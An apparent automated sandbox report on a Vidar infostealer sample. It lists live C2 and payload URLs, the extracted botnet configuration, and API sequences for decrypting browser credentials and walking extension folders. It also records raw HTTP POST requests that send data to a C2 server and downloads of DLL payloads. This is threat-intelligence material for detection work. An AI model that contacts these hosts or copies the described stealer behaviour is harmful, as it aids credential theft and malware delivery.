194.87.219.156	unknown	Russian Federation	197695	AS-REGRU	false
75.97.173.28	unknown	United States	3737	AS-PTDUS	false
91.194.11.174	unknown	Russian Federation	42994	HQservCommunicationSolutionsIL	false
67.166.47.100	unknown	United States	7922	COMCAST-7922US	false
68.148.96.106	unknown	Canada	6327	SHAWCA	true
70.18.38.5	unknown	United States	701	UUNETUS	false
5.64.137.68	unknown	United Kingdom	5607	BSKYB-BROADBAND-ASGB	false
68.53.161.168	unknown	United States	7922	COMCAST-7922US	true
119.13.124.67	unknown	Australia	9723	ISEEK-AS-APiseekCommunicationsPtyLtdAU	false
68.119.203.48	unknown	United States	20115	CHARTER-20115US	false
130.185.251.21	unknown	Bulgaria	203380	DAINTERNATIONALGROUPGB	false
198.46.178.145	unknown	United States	36352	AS-COLOCROSSINGUS	false
91.224.234.189	unknown	Russian Federation	56542	PARKTELECOM-ASRU	true
24.124.34.93	unknown	United States	11232	MIDCO-NETUS	false
99.252.52.199	unknown	Canada	812	ROGERS-COMMUNICATIONSCA	false
73.62.1.179	unknown	United States	7922	COMCAST-7922US	true
186.28.6.171	unknown	Colombia	19429	ETB-ColombiaCO	false

Private

IP
127.0.0.1

Contacted Domains

Name	IP	Active
steamcommunity.com	23.192.247.89	true
arpdabl.zapto.org	77.91.101.71	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://5.75.212.60/sqls.dll	true	12%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://steamcommunity.com/profiles/76561199747278259	true	Avira URL Cloud: malware	unknown
http://198.46.178.145/7847438767.exe	false	Avira URL Cloud: safe	unknown
https://5.75.212.60/softokn3.dll	false	Avira URL Cloud: malware	unknown

AV Detection

Antivirus detection for URL or domain

Source: https://5.75.212.60/vcruntime140.dll;	Avira URL Cloud: Label: malware
Source: https://5.75.212.60/sqls.dll	Avira URL Cloud: Label: malware
Source: https://steamcommunity.com/profiles/76561199747278259/badges	Avira URL Cloud: Label: malware
Source: https://5.75.212.60/0	Avira URL Cloud: Label: malware
Source: https://5.75.212.60//	Avira URL Cloud: Label: malware
Source: https://banana.incognet.io/	Avira URL Cloud: Label: malware
Source: https://5.75.212.60/#	Avira URL Cloud: Label: malware
Source: https://5.75.212.60/;	Avira URL Cloud: Label: malware
Source: https://5.75.212.60/A	Avira URL Cloud: Label: malware
Source: https://t.me/armad2a	Avira URL Cloud: Label: malware
Source: https://5.75.212.60/4	Avira URL Cloud: Label: malware
Source: https://5.75.212.60/5	Avira URL Cloud: Label: malware
Source: https://5.75.212.60/2	Avira URL Cloud: Label: malware
Source: https://5.75.212.60/6	Avira URL Cloud: Label: malware
Source: https://5.75.212.60/softokn3.dllnXq	Avira URL Cloud: Label: malware
Source: https://5.75.212.60/H	Avira URL Cloud: Label: malware
Source: https://steamcommunity.com/profiles/76561199747278259	Avira URL Cloud: Label: malware
Source: https://5.75.212.60/EGIDHDHIDG	Avira URL Cloud: Label: malware
Source: https://5.75.212.60/e	Avira URL Cloud: Label: malware
Source: https://5.75.212.60/licies	Avira URL Cloud: Label: malware
Source: https://5.75.212.60/softokn3.dll	Avira URL Cloud: Label: malware
Source: https://5.75.212.60/freebl3.dllE	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000000.00000002.2762584884.00000000040A0000.00000040.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199747278259"], "Botnet": "e0c99e9ff0b95355e8ec19c548ab0f83"}

Multi AV Scanner detection for domain / URL

Source: arpdabl.zapto.org	Virustotal: Detection: 11%	Perma Link
Source: https://5.75.212.60/sqls.dll	Virustotal: Detection: 11%	Perma Link
Source: https://5.75.212.60//	Virustotal: Detection: 11%	Perma Link
Source: https://5.75.212.60/0	Virustotal: Detection: 5%	Perma Link
Source: https://5.75.212.60/#	Virustotal: Detection: 11%	Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\euasv89vr56qz5toefmgc1.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00406D50 CryptUnprotectData,LocalAlloc,LocalFree,	0_2_00406D50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00406CD0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	0_2_00406CD0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00410DF0 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,	0_2_00410DF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00408980 memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,PK11_FreeSlot,lstrcatA,PK11_FreeSlot,lstrcatA,	0_2_00408980
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7F6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,	0_2_6C7F6C80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C94A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,	0_2_6C94A9A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9444C0 PK11_PubEncrypt,	0_2_6C9444C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C914420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,	0_2_6C914420
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C944440 PK11_PrivDecrypt,	0_2_6C944440
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9925B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,	0_2_6C9925B0

Compliance

Detected unpacking (creates a PE file in dynamic memory)

Source: C:\ProgramData\BFCAAEHJDB.exe

Unpacked PE file: 6.2.BFCAAEHJDB.exe.3370000.2.unpack

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 0.2.file.exe.400000.0.unpack

Uses 32bit PE files

Source: file.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\AppData\Local\Temp\euasv89vr56qz5toefmgc1.exe

File created: C:\Users\user\AppData\Local\Temp\installer.log

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 23.192.247.89:443 -> 192.168.2.6:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 5.75.212.60:443 -> 192.168.2.6:49714 version: TLS 1.2

Source:	Binary string: freebl3.pdb source: file.exe, 00000000.00000002.2771309518.0000000023AAE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2788158189.000000006C85D000.00000002.00000001.01000000.00000008.sdmp, file.exe, 00000000.00000002.2773812386.0000000029A18000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: freebl3.pdbp source: file.exe, 00000000.00000002.2771309518.0000000023AAE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2783489358.00000000417CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2788533136.000000006CA1F000.00000002.00000001.01000000.00000007.sdmp
Source:	Binary string: softokn3.pdb@ source: file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: RfxVmt.pdb source: BFCAAEHJDB.exe, 00000007.00000003.2859028722.00000000044A4000.00000004.00000020.00020000.00000000.sdmp, BFCAAEHJDB.exe, 00000007.00000003.2850857977.00000000044A2000.00000004.00000020.00020000.00000000.sdmp, euasv89vr56qz5toefmgc1.exe, 0000000E.00000000.2871865920.00007FF67096E000.00000008.00000001.01000000.0000000C.sdmp, main.exe, 00000017.00000002.3440296730.000001E398B72000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: file.exe, 00000000.00000002.2781145830.000000003B860000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: file.exe, 00000000.00000002.2776697381.000000002F98F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: nss3.pdb source: file.exe, 00000000.00000002.2783489358.00000000417CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2788533136.000000006CA1F000.00000002.00000001.01000000.00000007.sdmp
Source:	Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2788158189.000000006C85D000.00000002.00000001.01000000.00000008.sdmp, file.exe, 00000000.00000002.2773812386.0000000029A18000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: file.exe, 00000000.00000002.2768266325.000000001B807000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2767419498.00000000191C8000.00000002.00001000.00020000.00000000.sdmp
Source:	Binary string: RfxVmt.pdbGCTL source: BFCAAEHJDB.exe, 00000007.00000003.2859028722.00000000044A4000.00000004.00000020.00020000.00000000.sdmp, BFCAAEHJDB.exe, 00000007.00000003.2850857977.00000000044A2000.00000004.00000020.00020000.00000000.sdmp, euasv89vr56qz5toefmgc1.exe, 0000000E.00000000.2871865920.00007FF67096E000.00000008.00000001.01000000.0000000C.sdmp, main.exe, 00000017.00000002.3440296730.000001E398B72000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: softokn3.pdb source: file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp

Contains functionality to enumerate network shares

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDA3896DF3 LocalAlloc,wcsncpy,LookupAccountNameW,GetLastError,GetLastError,LocalAlloc,LookupAccountNameW,LocalFree,GetLastError,ConvertSidToStringSidA,GetLastError,wcslen,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,NetApiBufferFree,NetUserEnum,GetProcessHeap,HeapAlloc,memcpy,GetProcessHeap,HeapFree,		23_2_00007FFDA3896DF3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDA3896DAF NetApiBufferFree,NetUserEnum,GetProcessHeap,HeapAlloc,memcpy,GetProcessHeap,HeapFree,		23_2_00007FFDA3896DAF

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00401110 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,LoadLibraryW,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00401110
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004099F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_004099F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040A2C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_0040A2C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004156C0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	0_2_004156C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040C2E0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0040C2E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00415EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00415EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00414F80 wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcatA,strtok_s,strtok_s,memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,FindNextFileA,FindClose,	0_2_00414F80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040B390 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0040B390
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00409D40 StrCmpCA,FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00409D40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00415A70 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	0_2_00415A70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040AAB0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_0040AAB0
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FF6209447F3 FindNextFileA,_mbscpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	23_2_00007FF6209447F3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDA389A0D3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	23_2_00007FFDA389A0D3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDA38C1883 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	23_2_00007FFDA38C1883
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDAC0A5BF3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	23_2_00007FFDAC0A5BF3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDAC0D5803 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	23_2_00007FFDAC0D5803
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDAC0F5253 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	23_2_00007FFDAC0F5253
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDAC122FE3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	23_2_00007FFDAC122FE3

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_004153C0 GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,

0_2_004153C0

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://steamcommunity.com/profiles/76561199747278259

Connects to many ports of the same IP (likely port scanning)

Source: global traffic	TCP traffic: 45.8.98.78 ports 19063,0,1,3,6,9
Source: global traffic	TCP traffic: 204.8.84.94 ports 20578,0,2,5,7,8
Source: global traffic	TCP traffic: 68.148.96.106 ports 12385,1,2,3,5,8
Source: global traffic	TCP traffic: 82.165.57.155 ports 27813,1,2,3,7,8
Source: global traffic	TCP traffic: 68.53.161.168 ports 13749,1,3,4,7,9
Source: global traffic	TCP traffic: 73.62.1.179 ports 17850,0,1,5,7,8

Found Tor onion address

Source: BFCAAEHJDB.exe, 00000007.00000003.2859028722.000000000437F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/
Source: BFCAAEHJDB.exe, 00000007.00000003.2850857977.000000000437D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/
Source: euasv89vr56qz5toefmgc1.exe, 0000000E.00000000.2871865920.00007FF67096E000.00000008.00000001.01000000.0000000C.sdmp	String found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/
Source: main.exe	String found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,ht
Source: main.exe, 00000017.00000002.3442752199.00007FFD940A4000.00000002.00000001.01000000.00000011.sdmp	String found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/
Source: main.exe, 00000017.00000002.3440296730.000001E398B72000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/
Source: main.exe, 00000017.00000002.3441085501.000001E398F9D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/
Source: KXEmxT2p.23.dr	String found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/

Connects to several IPs in different countries

Source: unknown

Network traffic detected: IP country count 12

Detected TCP or UDP traffic on non-standard ports

Source: global traffic	TCP traffic: 192.168.2.6:49745 -> 91.92.250.213:1110
Source: global traffic	TCP traffic: 192.168.2.6:49758 -> 91.224.234.189:50444
Source: global traffic	TCP traffic: 192.168.2.6:49759 -> 81.6.45.56:33834
Source: global traffic	TCP traffic: 192.168.2.6:49760 -> 99.252.52.199:17541
Source: global traffic	TCP traffic: 192.168.2.6:49761 -> 68.148.96.106:12385
Source: global traffic	TCP traffic: 192.168.2.6:49762 -> 209.99.203.131:34320
Source: global traffic	TCP traffic: 192.168.2.6:49763 -> 70.18.38.5:28737
Source: global traffic	TCP traffic: 192.168.2.6:49764 -> 73.62.1.179:17850
Source: global traffic	TCP traffic: 192.168.2.6:49765 -> 45.8.98.78:19063
Source: global traffic	TCP traffic: 192.168.2.6:49766 -> 184.185.247.130:9859
Source: global traffic	TCP traffic: 192.168.2.6:49767 -> 82.165.57.155:27813
Source: global traffic	TCP traffic: 192.168.2.6:49768 -> 204.8.84.94:20578
Source: global traffic	TCP traffic: 192.168.2.6:49769 -> 5.64.137.68:11737
Source: global traffic	TCP traffic: 192.168.2.6:49770 -> 24.92.16.253:16063
Source: global traffic	TCP traffic: 192.168.2.6:49771 -> 91.149.237.69:26412
Source: global traffic	TCP traffic: 192.168.2.6:49772 -> 68.119.203.48:9756
Source: global traffic	TCP traffic: 192.168.2.6:49773 -> 68.53.161.168:13749
Source: global traffic	TCP traffic: 192.168.2.6:49774 -> 119.13.124.67:29762
Source: global traffic	UDP traffic: 192.168.2.6:14604 -> 95.165.139.85:43117
Source: global traffic	UDP traffic: 192.168.2.6:14604 -> 194.87.219.156:19047
Source: global traffic	UDP traffic: 192.168.2.6:14604 -> 75.97.173.28:14634
Source: global traffic	UDP traffic: 192.168.2.6:14604 -> 73.38.186.219:20033
Source: global traffic	UDP traffic: 192.168.2.6:14604 -> 173.230.128.232:26930
Source: global traffic	UDP traffic: 192.168.2.6:14604 -> 130.185.251.21:18735
Source: global traffic	UDP traffic: 192.168.2.6:14604 -> 67.166.47.100:15536
Source: global traffic	UDP traffic: 192.168.2.6:14604 -> 186.28.6.171:15230
Source: global traffic	UDP traffic: 192.168.2.6:14604 -> 91.194.11.174:19248
Source: global traffic	UDP traffic: 192.168.2.6:14604 -> 139.59.20.27:14719
Source: global traffic	UDP traffic: 192.168.2.6:14604 -> 24.124.34.93:27057
Source: global traffic	UDP traffic: 192.168.2.6:14604 -> 216.9.179.60:25750

Downloads executable code via HTTP

Source: global traffic

HTTP GET or POST without a user agent

Source: global traffic

HTTP traffic detected: GET /profiles/76561199747278259 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 23.192.247.89 23.192.247.89
Source: Joe Sandbox View	IP Address: 77.91.101.71 77.91.101.71

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JDAKJDAAFBKFHIEBFCFBUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 279Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HCAAEGIJKEGHIDGCBAEBUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GHDBAFIIECBFHIEBKJJKUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IJKKKFCFHCFIECBGDHIDUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IDBGHDGHCGHCAAKFIIECUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 7901Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqls.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HIJJEGDBFIIDGCAKJEBKUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 829Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AAKEGIJEHJDGDHJKJKKJUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
